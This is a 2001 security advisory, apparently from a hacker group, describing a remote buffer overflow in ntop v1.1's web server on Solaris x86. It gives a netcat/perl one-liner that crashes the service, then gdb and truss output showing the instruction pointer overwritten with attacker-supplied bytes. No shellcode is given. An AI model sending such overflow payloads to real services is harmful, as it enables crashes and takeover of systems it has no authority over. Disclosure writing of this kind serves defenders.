Ntop v1.1 for Solaris/x86 contains a remotely exploitable buffer overflow in the http server which defaults to tcp port 8080.
2a782b423c71b7af0e40453edb9508bf1af85c5776966f021fe5b239fb24adbc
======================================================================
Remote Buffer Overflow Under Solaris_x86
NTOP - Network Monitor vulnerable, allowing compromise of the system
Author: alt3kx! <alt3kx@raza-mexicana.org>
Alternative: <alt3kx_h3z@hotmail.com>
Date: 2001-05-23
Site: www.raza-mexicana.org
Greet to: _0x90_, Dex, PaTa , Rebel and S0r from AR & Spain
Teams: Raregazz - X-ploit and S0d
in special to White-B
======================================================================
------------------------=[Brief Description]=-------------------------
A buffer overflow exists at around 300 characters when a request is sent to
the port on which the daemon is running (in this case port 8080); users can
execute malicious code to obtain high privileges.
--------------------------=[Platforms]=--------------------------
Sun Solaris 7.0_x86
Sun Solaris 2.6_x86
---------------------------=[Summary]=----------------------------
Proof of concept :
# ls -la /opt/ntop/bin/ntop
-rwsr-xr-x 1 bin bin 249680 May 3 1999 /opt/ntop/bin/ntop
#
Step one:
Run the ntop daemon as root
# /opt/ntop/bin/ntop -w 8080
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.
Copyright 1998-99 by Luca Deri <deri@unipi.it>
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
.
.
.
.
.
Step two:
Run the following command as a normal user:
[local]:alt3kx# printf "GET /`perl -e 'print "A"x245'`\r\n\r\n" |nc
localhost 8080
HTTP/1.0 200 OK
Server: ntop/1.1 (i386-pc-solaris2.7)
Content-type: text/html
<HTML>
<HEAD>
<META HTTP-EQUIV=REFRESH CONTENT=120>
</HEAD>
<BODY BGCOLOR=#FFFFFF>
<P><H1><FONT FACE=Helvetica>Unable to find information related to
host<i>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>
</HEAD>
<BODY BGCOLOR=#FFFFFF>
FRESH
CONTENT=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</i></FONT></H1>
</CENTER>
</CENTER><hr><FONT FACE=Helvetica><H5>Generated by <A
HREF="https://www-serra.unipi.it/~ntop/">ntop</A> v.1.1 MT
[i386-pc-solaris2.7] listening on elxl0<br>
<address>© 1998-99 by <A HREF=mailto:deri@unipi.it>L.
Deri</A></H5></font></BODY></HTML>
[local]:alt3kx#
SUCKS!!! NOT FUNCTIONAL, AGAIN with more A's :-)
[local]:alt3kx# printf "GET /`perl -e 'print "A"x246'`\r\n\r\n" |nc
localhost 8080
[local]:alt3kx#
In another shell you can see this:
# /opt/ntop/bin/ntop -w 8080
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.
Copyright 1998-99 by Luca Deri <deri@unipi.it>
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
Segmentation Fault(coredump)
#
[local]:alt3kx# gdb ntop --core=core
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-pc-solaris2.7"...
Core was generated by `ntop'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /lib/libsocket.so.1...done.
Reading symbols from /lib/libnsl.so.1...done.
Reading symbols from /lib/libgen.so.1...done.
Reading symbols from /lib/libc.so.1...done.
Reading symbols from /lib/libdl.so.1...done.
Reading symbols from /lib/libmp.so.2...done.
#0 0x41414141 in ?? ()
(gdb) info all-registers
eax 0x1 1
ecx 0xdffe19c8 -536995384
edx 0x20a 522
ebx 0x80cef44 135065412
esp 0x8046f14 0x8046f14
ebp 0x41414141 0x41414141
esi 0xc8 200
edi 0x80980f5 134840565
eip 0x41414141 0x41414141
eflags 0x10206 66054
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x0 0
(gdb)
[local]:alt3kx# truss /opt/ntop/bin/ntop
open("/dev/zero", O_RDONLY) = 3
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xDFFE1000
sysconfig(_CONFIG_PAGESIZE) = 4096
open("./libsocket.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libsocket.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFDF000
mmap(0x00000000, 40960, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFD4000
mmap(0xDFFDC000, 5712, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xDFFDC000
close(4) = 0
open("./libnsl.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libnsl.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 503808, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0xDFF58000
mmap(0xDFFC5000, 23248, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 442368) = 0xDFFC5000
mmap(0xDFFCB000, 29472, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFFCB000
close(4) = 0
open("./libgen.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libgen.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 32768, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFF4F000
mmap(0xDFF55000, 4184, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 20480) = 0xDFF55000
close(4) = 0
open("./libc.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libc.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 593920, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0xDFEBD000
mmap(0xDFF46000, 25448, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 557056) = 0xDFF46000
mmap(0xDFF4D000, 3316, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFF4D000
close(4) = 0
open("./libdl.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libdl.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
close(4) = 0
open("./libmp.so.2", O_RDONLY) Err#2 ENOENT
open("/lib/libmp.so.2", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEBB000
mmap(0x00000000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEB6000
mmap(0xDFEB9000, 2524, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xDFEB9000
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xDFEB4000
close(4) = 0
close(3) = 0
[...............]
door_info(3, 0x08044528) = 0
door_call(3, 0x08044510) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
Incurred fault #6, FLTBOUNDS %pc = 0x41414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
bug discovered by alt3kx! <alt3kx@raza-mexicana.org> &
<alt3kx_h3z@hotmail.com>
Possible C0de coming soon .... je :-)
---------------------------=[PATCH]=-----------------------------
Download the latest packages from Sun Microsystems
-------------------------=[Company Compromise]=-------------------
https://www.sun.com
https://www.ntop.org